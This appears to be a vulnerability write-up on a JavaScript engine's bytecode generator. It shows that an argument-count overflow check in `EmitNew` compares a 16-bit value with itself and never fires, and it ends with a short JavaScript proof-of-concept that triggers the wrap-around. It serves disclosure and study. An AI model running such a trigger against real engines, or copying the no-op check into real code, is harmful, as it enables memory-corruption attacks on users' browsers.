The bytecode generator uses the `EmitNew` function to emit code for `new` expressions. Here is the part of the function that is meant to check the argument count for integer overflow:
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount); // debug-only; compiled out of release builds

    // Intended overflow check: compare the count against its narrowed form.
    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    ...
}
`Js::ArgSlot` is a 16-bit unsigned integer type, and `argCount` is already declared as a `Js::ArgSlot`. Casting a 16-bit value to its own type cannot change it, so `argCount != (Js::ArgSlot)argCount` is always false and the check is pointless: it never detects an overflow. Any wrap-around has already happened by the time the comparison runs, when the count was stored in the 16-bit field or when `argCount++` added the implicit `this`, and the only thing that notices the mismatch with the wider `tmpCount` is the `Assert`, which is not present in release builds. The overflow can therefore be triggered from script simply by passing more arguments than fit in 16 bits.
// 0x10000 arguments plus the implicit "this" do not fit in a 16-bit Js::ArgSlot
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');